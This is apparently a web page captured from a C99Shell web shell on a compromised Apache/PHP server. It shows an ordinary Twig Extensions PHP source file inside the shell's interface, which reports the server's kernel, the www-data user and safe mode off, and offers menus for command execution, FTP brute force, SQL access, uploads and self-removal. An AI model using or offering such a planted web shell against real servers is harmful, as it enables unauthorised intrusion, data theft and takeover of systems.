!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/php/Twig-Extensions/lib/Twig/Extensions/Grammar/   drwxr-xr-x
Free 13.15 GB of 57.97 GB (22.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Optional.php (2.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of Twig.
 *
 * (c) 2010 Fabien Potencier
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/**
 * @deprecated since version 1.5
 */
class Twig_Extensions_Grammar_Optional extends Twig_Extensions_Grammar
{
    protected 
$grammar;

    public function 
__construct()
    {
        
$this->grammar = array();
        foreach (
func_get_args() as $grammar) {
            
$this->addGrammar($grammar);
        }
    }

    public function 
__toString()
    {
        
$repr = array();
        foreach (
$this->grammar as $grammar) {
            
$repr[] = (string) $grammar;
        }

        return 
sprintf('[%s]'implode(' '$repr));
    }

    public function 
addGrammar(Twig_Extensions_GrammarInterface $grammar)
    {
        
$this->grammar[] = $grammar;
    }

    public function 
parse(Twig_Token $token)
    {
        
// test if we have the optional element before consuming it
        
if ($this->grammar[0] instanceof Twig_Extensions_Grammar_Constant) {
            if (!
$this->parser->getStream()->test($this->grammar[0]->getType(), $this->grammar[0]->getName())) {
                return array();
            }
        } elseif (
$this->grammar[0] instanceof Twig_Extensions_Grammar_Name) {
            if (!
$this->parser->getStream()->test(Twig_Token::NAME_TYPE)) {
                return array();
            }
        } elseif (
$this->parser->getStream()->test(Twig_Token::BLOCK_END_TYPE)) {
            
// if this is not a Constant or a Name, it must be the last element of the tag

            
return array();
        }

        
$elements = array();
        foreach (
$this->grammar as $grammar) {
            
$grammar->setParser($this->parser);

            
$element $grammar->parse($token);
            if (
is_array($element)) {
                
$elements array_merge($elements$element);
            } else {
                
$elements[$grammar->getName()] = $element;
            }
        }

        return 
$elements;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0072 ]--